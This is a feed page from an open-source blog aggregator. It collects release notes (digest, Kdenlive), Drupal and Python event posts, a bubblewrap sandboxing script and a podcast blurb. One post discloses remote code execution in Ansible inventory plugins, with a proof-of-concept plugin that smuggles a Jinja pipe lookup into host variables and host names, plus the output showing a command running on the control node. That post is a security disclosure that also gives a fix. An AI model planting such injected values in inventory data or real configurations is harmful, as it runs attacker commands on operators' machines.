FLOSS Project Planets

Dirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code

Planet Debian - Mon, 2024-03-11 19:23

Release 0.6.35 of the digest package arrived at CRAN today and has also been uploaded to Debian already.

digest creates hash digests of arbitrary R objects. It can use a number different hashing algorithms (md5, sha-1, sha-256, sha-512, crc32, xxhash32, xxhash64, murmur32, spookyhash, blake3,crc32c – and now also xxh3_64 and xxh3_128), and enables easy comparison of (potentially large and nested) R language objects as it relies on the native serialization in R. It is a mature and widely-used package (with 65.8 million downloads just on the partial cloud mirrors of CRAN which keep logs) as many tasks may involve caching of objects for which it provides convenient general-purpose hash key generation to quickly identify the various objects.

This release updates the included xxHash version to the current verion 0.8.2 updating the existing xxhash32 and xxhash64 hash functions — and also adding the newer xxh3_64 and xxh3_128 ones. We have a project at work using xxh3_128 from Python which made me realize having it from R would be nice too, and given the existing infrastructure in the package actually doing so was fairly quick and straightforward.

My CRANberries provides a summary of changes to the previous version. For questions or comments use the issue tracker off the GitHub repo. For documentation (including the changelog) see the documentation site.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Categories: FLOSS Project Planets

Liip: Throwback to Drupal Mountain Camp 2024

Planet Drupal - Mon, 2024-03-11 19:00

Against the backdrop of snow-capped peaks and invigorating alpine air, attendees immersed themselves in a whirlwind of workshops, discussions, and outdoor activities showcasing the vibrant spirit of open-source technology and the beauty of the Swiss mountains.

We took this opportunity to ask Josef Kruckenberg, Product Owner at Liip and co-organiser of the Drupal Mountain Camp, a few questions.

Josef Kruckenberg, Product Owner at Liip and co-organiser of the Drupal Mountain Camp ©Patrick Itten

What are the goals of the Drupal Mountain Camp?

The Drupal Mountain Camp brings together experts and newcomers in web development to share their knowledge of creating interactive websites using Drupal and related web technologies. We are committed to uniting a diverse crowd from different disciplines, such as developers, designers, project managers, agency and community leaders.

The main highlights include:

  • Pre-conference with skiing, snowboarding and co-working in Davos in the Swiss Alps
  • 3 keynotes on headless CMS, open-source funding and personal development
  • 3 days with workshops, sessions and exchanges around the open-source CMS Drupal

What is your involvement in this, also as a Liiper?

As Drupal Community Coordinator at Liip, Jens Vranckx and I are part of the organising team that makes the Drupal Mountain Camp happen. For this year's edition, I have been focusing on recruiting keynote speakers and inviting speakers from other countries to provide a rich and diverse line-up. I also coordinate with our marketing team, coordinate some logistics at the venue, encourage Liipers to speak, and have fun taking pictures of the event.

In our workshop, Drupal for End Users, Jonathan Noack and I compared the different ways of creating landing pages with Drupal and allowed the audience to test blökkli, our interactive, open-source page-building solution.

As a board member of the Drupal Switzerland association, I’m also organising a Drupal Local Association Updates session that acts as an exchange format for open-source leaders in countries like France, Belgium, and Switzerland.

Jonathan Noack presenting blökkli ©Patrick Itten

Which speech inspired you the most and why?

I especially enjoyed Tearyne Almandarez's talk about grit and personal development. It reminded me of how I dealt with difficult challenges in my career, how imposter syndrome can hold one back and how important it is to find clarity about where you want to go, especially if that means you have to go outside of your comfort.

What outcomes would you like to share following this edition?

The Swiss and international Drupal community had a lot to share within the days of the mountain camp.

It's inspiring to see the multitude of approaches to solve key problems, such as interactive page building with Drupal.

I'm proud of the Liip team for contributing substantially to open-source by sponsoring and co-organising Drupal Mountain Camp and sharing our knowledge in many sessions.

Conference of Jutta Horstmann ©Patrick Itten

What are the next challenges?

The Drupal Mountain Camp is all about bringing people together. The organisers will get together, do a retrospective and get ready for the next iteration. What can we do to make it more accessible? Will we do it as usual in Davos? We had a lot of good discussions already at the conference, so I’m looking forward to seeing where we take the organisation next.

For Liip, we will continue investing highly in the open-source and Drupal community. We are excited to see how the community will use blökkli and what they contribute back to it.

Categories: FLOSS Project Planets

Python Engineering at Microsoft: Data Science Day 2024 – Schedule Announcement

Planet Python - Mon, 2024-03-11 18:05
.badge1 { background-color: #4a7cb5; color: white; padding: 4px 8px; text-align: center; border-radius: 5px; font-size:small; } .badge2 { background-color: #9180ed; color: white; padding: 4px 8px; text-align: center; border-radius: 5px; font-size:small; } .badge3 { background-color: #56c6b9; color: white; padding: 4px 8px; text-align: center; border-radius: 5px; font-size:small; } .badge4 { background-color: #002b98; color: white; padding: 4px 8px; text-align: center; border-radius: 5px; font-size:small; } .badge5 { background-color: #d0c493; color: black; padding: 4px 8px; text-align: center; border-radius: 5px; font-size:small; }

 

 

We are thrilled to announce Python Data Science Day will be taking place March 14th, 2024; a “PyDay” on Pi Day: 3.14 . If you’re a Python developer, entrepreneur, data scientist, student, or researcher working on projects from hobbyist and start up to enterprise level, you’ll find solutions to modernize your data pipelines and answer complex queries with data.

Save the date!

During the event, you will hear directly from the experts, community members and Python and Data Science Microsoft MVPs, about the latest in Python Data Science. Whether you’re a beginner or an experienced Python Data Scientist, this event is for you.

We’ll cover three main areas:

  • The latest in Data Science with Python
    • New packages and research
    • Teaching Data Science with Python
    • Interesting new Data Sets and sources for data
  • Tools for Data Science
    • Code editors and developer tools
    • Tool chains/platforms for analysis
    • AI tools for Data Science
    • Microsoft tools (Fabric, Synapse, Azure AI/ML, VS Code)
  • Scaling Data Science to the Cloud
    • Databases + Data ingestion
    • Cloud-based computation and collaboration
    • Cloud resource management + DevOps
Agenda Session Title Theme Audience Speaker Time Pacific Type Welcome All Dawn Wages & Hosts! 9:00AM From Data to Insights: Data Science with Microsoft Fabric Data Science Tools Beginner; Intermediate Jasmine Greennaway, Ismaël Mejía 9:10AM 5 – 10 minute Lightning Talk Revolutionizing Data Science Workflows: Unleashing the Potential of Microsoft Visual Studio Code Data Science Tools Beginner; Student; Hobbyist;Research; Sumukh M G 9:20AM 5 – 10 minute Lightning Talk RAG using Semantic Kernel with Azure OpenAI and Azure Cosmos DB for MongoDB vCore Data Science Tools Scaling to the Cloud Intermediate; Advanced; Start Up; Student; Hobbyist; John Aziz 9:30AM 25 minute session Simplifying Data Analysis & Visualization (for non-Python devs) with AI Data Science Tools Beginner; Intermediate; Student; Research; Hobbyist; Nitya Narasimhan, PhD 10:00AM 25 minute session Getting started with Python using Data Wrangler in Microsoft Fabric Data Science Tools Get started with Data Science Beginner; Intermediate; Sandeep Pawar 10:35AM 5 – 10 minute Lightning Talk Buddy Driven Development Latest in Data Science Beginner; Intermediate; Bethany Jepchumba 10:45AM 5 – 10 minute Lightning Talk Supercharging your Data Science projects with GitHub tools Data Science Tools Intermediate; Start Up; Enterprise; Student; Carlotta Castelluccio 10:55AM 25 minute session Streamlining Data Preparation with Pydantic: A 25-Minute Guide Data Science Tools Latest in Data Science Intermediate; Hasan Özdemir 11:25AM 25 minute session Level Up Your ML Game: Building Models like a Pro with Microsoft Fabric’s Synapse Data Science Tools Latest in Data Science Beginner; Intermediate; Start Up; Enterprise;Student; Vinayak Gavariya 11:55AM 5 – 10 minute Lightning Talk Python Data Science Skilling – Cloud Skills Challenge Data Science Tools Latest in Data Science Get started with Data Science Beginner;Intermediate; Advanced; Start Up; Student; Research; Hobbyist; Aaron Stark 12:05PM 5 – 10 minute Lightning Talk Unleash The Power of Deep Learning: Build A Dog vs Cat Image Classifer Using CNN With TensorFlow Keras Latest in Data Science Intermediate; Student; Research; Jyothi Swaroop Makena 12:15PM 25 minute session Serverless Jupyter Notebook Functions Latest in Data Science Scaling to the Cloud Intermediate; Student; Research; — 12:45PM 25 minute session Beyond Keywords: Image similarity search in Azure Cosmos DB for PostgreSQL Data Science Tools Intermediate; Foteini Savvidou 1:20PM 5 – 10 minute Lightening Talk Python at Microsoft All Levels Dawn Wages 1:30PM 5 – 10 minute Lightning Talk Microsoft Fabric for Python Developers Data Science ToolsLatest in Data Science Beginner; Intermediate; Eren Orbey 1:40PM 25 minute session Data Science: The Bear* Necessities Data Science Tools Get started with Data Science Beginner; Student; Hobbyist; Renee Noble 2:10PM 25 minute session Surprise Guest! TBA Beginner; Student; Hobbyist; TBA 2:40PM 5 – 10 minute Lightning Talk Surprise Guest! TBA Beginner; Student; Hobbyist; TBA 2:50PM 5 – 10 minute Lightning Talk Empowering Data-Driven Innovation: A Journey through Real-World Applications Latest in Data Science Intermediate; Abdullah Awan 3:30PM 25 minute session Breaking Data Silos With Semantic Link In Microsoft Fabric Data Science Tools Latest in Data Science Intermediate; Sandeep Pawar 4:05PM 25 minute session More ways to engage with all the Data Science fun:
  • Join the Microsoft Fabric Global AI Hack Together on February 15th to March 4th, 2024. Fabric is an end-to-end AI-powered analytics platform that unites your data and services, including data science and data lakes. Register for the event to participate in live streams every week and solve real-world problems with guidance and a community.
  • Read our 14 Days of Python Data Science series where for fourteen days leading up to Python Data Science Day, we will drop cool articles and recipes for using Data Science on Microsoft tools. #14DaysOfDataScience
  • Check out the Data Science Cloud Skills Challenge if you want to go through some self-paced learning! This challenge is active until April 15th, 2024.
  • Join us on Discord at https://aka.ms/python-discord
More Data Science at Microsoft…

The post Data Science Day 2024 – Schedule Announcement appeared first on Python.

Categories: FLOSS Project Planets

TEN7: Just Say Drupal

Planet Drupal - Mon, 2024-03-11 17:52
A community call to action... let's ditch version numbers in the brand and just say Drupal. Drupal 7 becomes “Legacy Drupal” but we keep semantic versions around and invest in operational best practices.
Categories: FLOSS Project Planets

ImageX: Integrate Zoom Meetings Seamlessly into Your Drupal Website via Our Developer’s Module

Planet Drupal - Mon, 2024-03-11 17:47

Authored by: Nadiia Nykolaichuk and Leonid Bogdanovych.

Zoom is a key player in the sphere of online meetings. They have the power to dissolve geographical barriers, uniting individuals and teams across vast distances for communication and collaboration. What can be more convenient than using a robust video conferencing platform? Using it in the comfort of your own Drupal website!

Categories: FLOSS Project Planets

Joachim Breitner: Convenient sandboxed development environment

Planet Debian - Mon, 2024-03-11 16:39

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.

In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.

Convenient or it won’t happen

Nevertheless I thought I should do something about this. The safest option would probably to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenient, and one that does not get too much in the way of my current habits.

For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. git push, git pull from private repositories, gh pr create) from “the outside”, and the actual build environment can do without access to these secrets.

The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual /home directory.

I initially followed the blog post “Application Isolation using NixOS Containers” by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like firejail can achieve roughly the same with a less “global” setup. I tried to use firejail, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool https://github.com/containers/bubblewrap.

Selective bubblewrapping

This script, called dev and included below, builds a new filesystem namespace with minimal /proc and /dev directories, it’s own /tmp directories. It then binds-mound some directories to make the host’s NixOS system available inside the container (/bin, /usr, the nix store including domain socket, stuff for OpenGL applications). My user’s home directory is taken from ~/.dev-home and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a direnv enable in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding .Xauthority file is made available. And finally, if I run dev in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.

The effect is that I can type dev on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a git push I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.

Clearly, isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in $HOME.

Rough corners

There is more polishing that could be done.

  • In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a xdg-desktop-portal user service, a filtering dbus proxy, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get xdg-desktop-portal to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.

  • With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running evolution or firefox inside the container, and if I do not even have VSCode or cabal available outside, so that it’s less likely that I forget to enter dev before using these tools.

    It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to bubblewrap here.

So likely I will refine this some more over time. Or get tired of typing dev and going back to what I did before…

The script The dev script (at the time of writing) #!/usr/bin/env bash extra=() if [[ "$PWD" == /home/jojo/build/* ]] || [[ "$PWD" == /home/jojo/projekte/programming/* ]] then extra+=(--bind "$PWD" "$PWD" --chdir "$PWD") fi if [ -n "$1" ] then cmd=( "$@" ) else cmd=( bash ) fi # Caveats: # * access to all of `/etc` # * access to `/nix/var/nix/daemon-socket/socket`, and is trusted user (but needed to run nix) # * access to X11 exec bwrap \ --unshare-all \ \ `# blank slate` \ --share-net \ --proc /proc \ --dev /dev \ --tmpfs /tmp \ --tmpfs /run/user/1000 \ \ `# Needed for GLX applications, in paticular alacritty` \ --dev-bind /dev/dri /dev/dri \ --ro-bind /sys/dev/char /sys/dev/char \ --ro-bind /sys/devices/pci0000:00 /sys/devices/pci0000:00 \ --ro-bind /run/opengl-driver /run/opengl-driver \ \ --ro-bind /bin /bin \ --ro-bind /usr /usr \ --ro-bind /run/current-system /run/current-system \ --ro-bind /nix /nix \ --ro-bind /etc /etc \ --ro-bind /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf \ \ --bind ~/.dev-home /home/jojo \ --ro-bind ~/.config/alacritty ~/.config/alacritty \ --ro-bind ~/.config/nvim ~/.config/nvim \ --ro-bind ~/.local/share/nvim ~/.local/share/nvim \ --ro-bind ~/.bin ~/.bin \ \ --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 \ --bind ~/.Xauthority ~/.Xauthority \ --setenv DISPLAY :0 \ \ --setenv container dev \ "${extra[@]}" \ -- \ "${cmd[@]}"
Categories: FLOSS Project Planets

Test and Code: 216: ruff, uv, and Astral: Python tooling, much faster, with Rust

Planet Python - Mon, 2024-03-11 16:12

Charlie Marsh and team are using Rust to make Python tooling faster.

  • Ruff can take the place of Flake8, isort, and Black, and so much more.
  • uv can take the place of pip, pip-tools, and virtualenv
  • Astral is Charlie's venture backed company, and what they have with `ruff` and `uv` is just the start.

Since uv is the newest tool, there's quite a bit of the discussion diving into uv.

Links:


Sponsored by PyCharm Pro

The Complete pytest Course

  • For the fastest way to learn pytest, go to courses.pythontest.com
  • Whether your new to testing or pytest, or just want to maximize your efficiency and effectiveness when testing.
<p>Charlie Marsh and team are using Rust to make Python tooling faster.</p><ul><li>Ruff can take the place of Flake8, isort, and Black, and so much more.</li><li>uv can take the place of pip, pip-tools, and virtualenv</li><li>Astral is Charlie's venture backed company, and what they have with `ruff` and `uv` is just the start.</li></ul><p>Since uv is the newest tool, there's quite a bit of the discussion diving into uv.</p><p><strong>Links:</strong></p><ul><li><a href="https://astral.sh/ruff">ruff</a></li><li><a href="https://astral.sh">Astral</a></li><li><a href="https://github.com/astral-sh/uv">uv</a></li></ul> <br><p><strong>Sponsored by PyCharm Pro</strong></p><ul><li>Use code PYTEST for 20% off PyCharm Professional at <a href="https://www.jetbrains.com/pycharm/">jetbrains.com/pycharm</a></li><li>First 10 to sign up this month get a free month of AI Assistant</li><li>See how easy it is to run pytest from PyCharm at <a href="https://pythontest.com/pycharm/">pythontest.com/pycharm</a></li></ul><p><strong>The Complete pytest Course</strong></p><ul><li>For the fastest way to learn pytest, go to <a href="https://courses.pythontest.com/p/complete-pytest-course">courses.pythontest.com</a></li><li>Whether your new to testing or pytest, or just want to maximize your efficiency and effectiveness when testing.</li></ul>
Categories: FLOSS Project Planets

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

Planet Debian - Mon, 2024-03-11 16:00

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin from ansible.plugins.inventory import BaseInventoryPlugin class InventoryModule(BaseInventoryPlugin): NAME = 'evgeni.inventoryrce.inventory' def verify_file(self, path): valid = False if super(InventoryModule, self).verify_file(path): if path.endswith('evgeni.yml'): valid = True return valid def parse(self, inventory, loader, path, cache=True): super(InventoryModule, self).parse(inventory, loader, path, cache) self.inventory.add_host('exploit.example.com') self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local') self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list { "_meta": { "hostvars": { "exploit.example.com": { "ansible_connection": "local", "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}" } } }, "all": { "children": [ "ungrouped" ] }, "ungrouped": { "hosts": [ "exploit.example.com" ] } }

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

- hosts: all tasks: - name: Display all variables/facts known for a host ansible.builtin.debug: var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml PLAY [all] ************************************************************************************************ TASK [Gathering Facts] ************************************************************************************ ok: [exploit.example.com] TASK [Display all variables/facts known for a host] ******************************************************* ok: [exploit.example.com] => { "hostvars[inventory_hostname]": { "ansible_all_ipv4_addresses": [ "192.168.122.1" ], … "something_funny": "" } } PLAY RECAP ************************************************************************************************* exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!

% ls -alh /tmp/hacked -rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

from ansible.utils.unsafe_proxy import wrap_var … self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

for k, v in host_vars.items(): self.inventory.set_variable(name, k, v)

(aws_ec2.py)

for key, value in hostvars.items(): self.inventory.set_variable(hostname, key, value)

(hcloud.py)

for k, v in hostvars.items(): try: self.inventory.set_variable(host_name, k, v) except ValueError as e: self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

from ansible.plugins.inventory import BaseInventoryPlugin class InventoryModule(BaseInventoryPlugin): NAME = 'evgeni.inventoryrce.inventory' def verify_file(self, path): valid = False if super(InventoryModule, self).verify_file(path): if path.endswith('evgeni.yml'): valid = True return valid def parse(self, inventory, loader, path, cache=True): super(InventoryModule, self).parse(inventory, loader, path, cache) self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}') % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml PLAY [all] ************************************************************************************************ TASK [Gathering Facts] ************************************************************************************ fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true} PLAY RECAP ************************************************************************************************ lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0 % ls -alh /tmp/hacked-host -rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

Categories: FLOSS Project Planets

FSF Events: Free Software Directory meeting on IRC: Friday, March 15, starting at 12:00 EDT (16:00 UTC)

GNU Planet! - Mon, 2024-03-11 15:55
Join the FSF and friends on Friday, March 15, from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.
Categories: FLOSS Project Planets

Talking Drupal: Talking Drupal #441 - CI for Drupal modules

Planet Drupal - Mon, 2024-03-11 15:00

Today we are talking about CI for Drupal modules, How it helps us build Drupal, and the ongoing work and improvements being made with guest Fran Garcia-Linares. We’ll also cover Require on Publish as our module of the week.

For show notes visit: www.talkingDrupal.com/441

Topics
  • What does CI mean
  • How do Drupal modules use CI
  • When we talk about Drupal CI are we talking about the website itself or the CI that supports contributors
  • What tools does Drupal use for CI
  • How do maintainers interact with CI
  • What changes have happened in the last year
  • Speed improvements
  • Drupal CI vs Gitlab CI
  • Process to convert
  • When is Drupal CI being shut down
  • What improvements are coming
  • If someone has an issue where do they get help
Resources Guests

Fran Garcia-Linares - fjgarlin

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan John Picozzi - epam.com johnpicozzi Anna Mykhailova - kalamuna.com amykhailova

MOTW Correspondent

Martin Anderson-Clutz - mandclu

  • Brief description:
    • Have you ever wanted to have content fields that could be optional until a piece of content is published, or ready to be published? There’s a module for that.
  • Module name/project name:
  • Brief history
    • How old: created in Apr 2018 by Mike Priscella (mpriscella), though recent releases are by Mark Dorison (markdorison) of Chromatic
    • Versions available: 8.x-1.10
  • Maintainership
    • Actively maintained, latest release just over a month ago
    • Security coverage
    • Test coverage
    • Number of open issues: 18, 8 of which are bugs
  • Usage stats:
    • 3,001 sites
  • Module features and usage
    • With this module enabled, form to configure fields for you content types will have a new checkbox labeled “Required on Publish”
    • Check this new box instead of the normal “Required field” checkbox to have the field only required if the content is being published or already published
    • Useful for publishing workflows where you want content creators to be able to quickly get started on content, but ensure that fields will be filled in before publishing
    • Useful for fields that will optimize the content for SEO, social sharing, search, and so on
Categories: FLOSS Project Planets

Kdenlive 24.02.0 released

Planet KDE - Mon, 2024-03-11 12:52

The team is thrilled to introduce the much-anticipated release of Kdenlive 24.02, featuring a substantial upgrade to our frameworks with the adoption of Qt6 and KDE Frameworks 6. This significant under-the-hood transformation establishes a robust foundation, shaping the trajectory of Kdenlive for the next decade. The benefits of this upgrade are particularly noteworthy for Linux users, as improved Wayland support enhances the overall experience. Additionally, users on Windows, MacOS, and Linux will experience a substantial performance boost since Kdenlive now runs natively on DirectX, Metal, and Vulkan respectively, replacing the previous abstraction layer reliance on OpenGL and Angle, resulting in a more efficient and responsive application. This upgrade brings significant changes to packaging, featuring the introduction of a dedicated package for Apple Silicon, the discontinuation of PPA support and an enhanced method for installing the Whisper and Vosk speech-to-text engines.

While a significant effort has been invested in providing a stable user experience in this transition, we want to acknowledge that, like any evolving software, there might be some rough edges. Some known issues include: themes and icons not properly applied in Windows and AppImage, text not properly displayed in clips in the timeline when using Wayland and a crash in the Subtitle Manager under MacOS. Worth noting also is the temporary removal of the audio recording feature pending its migration to Qt6. We appreciate your understanding and encourage you to provide feedback in this release cycle so that we can continue refining and improving Kdenlive. In the upcoming release cycles (24.05 and 24.08), our development efforts will concentrate on stabilizing any remaining issues stemming from this upgrade. We’ll also prioritize short-term tasks outlined in our roadmap, with a specific emphasis on enhancing performance and streamlining the effects workflow.

In terms of performance enhancements, this release introduces optimized RAM usage during the import of clips into the Project Bin. Furthermore, it addresses Nvidia encoding and transcoding issues with recent ffmpeg versions.

To safeguard project integrity, measures have been implemented to prevent corruptions. Projects with non-standard and variable frame rates are not allowed to be created. When rendering a project containing variable frame rate clips, users will receive a warning with the option to transcode these clips, mitigating potential audio-video synchronization issues.

Users can now enjoy the convenience of an automatic update check without an active network connection. Glaxnimate animations now default to the rawr format, replacing Lottie. Furthermore, we’ve introduced an FFv1 render preset to replace the previously non-functional Ut Video. And multiple project archiving issues have been fixed.

Beyond performance and stability we’ve managed to sneak in several nifty quality-of-life and usability improvements, the highlights include:

Subtitles

This release introduces multiple subtitle support, allowing users to conveniently choose the subtitle from a drop-down list in the track header.

 

 

A subtitle manager dialog has been implemented to facilitate the import and export of subtitles.

Now, in the Import Subtitle dialog, you have the option to create a new subtitle instead of replacing the previous one.
Speech-to-Text

The Speech Editor, our text-based editing tool that enables users to add clips to the timeline from selected texts, now includes the option to create new sequences directly from the selected text. Effects

The initial implementation of the long awaited easing interpolation modes for keyframes has landed. Expected soon are easing types (ease in, ease out and ease in and out) and a graph editor.

 

The Gaussian Blur and Average Blur filters are now keyframable.

Rendering

Added the option to set an interpolation method for scaling operations on rendering.

Quality-of-Life and Usability

Added the option to apply an effect to a group of clips by simply dragging the effect onto any clip within the group.

Conveniently move or delete selected clips within a group using the Alt + Select option.

Added a toggle button to clips with effects to easily enable/disable them directly from the timeline.

Added list of last opened clips in Clip Monitor’s clip name

Added the ability to open the location of the rendered file in the file manager directly from the render queue dialog..

The Document Checker has been completely rewritten following the implementation of sequences. Now, when you open a project, Kdenlive checks if all the clips, proxies, sequences, and effects are loaded correctly. If any errors are spotted, Kdenlive seamlessly sorts them out in the project files, preventing any possible project corruptions

Added the ability to trigger a sound notification when rendering is complete. Full changelog
  • Fix multitrack view not exiting for some reason on tool switch (Qt6). Commit.
  • Fix qml warnings. Commit.
  • Show blue audio/video usage icons in project Bin for all clip types. Commit. See issue #1816
  • Multiple fixes for downloaded effect templates: broken link in effect info, empty name, cannot edit/delete. Commit.
  • New splash for 24.02. Commit.
  • Subtitles: add session id to tmp files to ensure 2 concurrent versions of a project don’t share the same tmp files. Commit. Fixes bug #481525
  • Fix title clip font’s weight lost between Qt5 and Qt6 projects. Commit.
  • Fix audio thumbnail not updated on replace clip in timeline. Commit. Fixes issue #1828
  • Refactor mouse position in the timeline to fix multiple small bugs. Commit. Fixes bug #480977
  • Subtitle import: disable ok button when no file is selected, only preview the 30 first lines. Commit.
  • Fix wrong clip dropped on timeline when subtitle track is visible. Commit. See bug #481325
  • Fix track name text color on Qt6. Commit.
  • Ensure we don’t mix title clips thumbnails (eg. in duplicated clips). Commit.
  • Fix scopes and titler bg on Win/Mac. Commit.
  • Fix incorrect item text. Commit.
  • Fix extract frame from video (fixes titler background, scopes, etc). Commit.
  • Make AVFilter average and gaussian blur keyframable. Commit.
  • Ensure we always load the latest xml definitions for effects. Commit.
  • Fix composition paste not correctly keeping a_track. Commit.
  • Ensure custom keyboard shortcuts are not deleted on config reset. Commit.
  • Fix crash after changing toolbar config: ensure all factory()->container actions are rebuild. Commit.
  • Try to fix white monitor on undock/fullscreen on Windows / Mac. Commit.
  • Fix sequence copy. Commit. See bug #481064
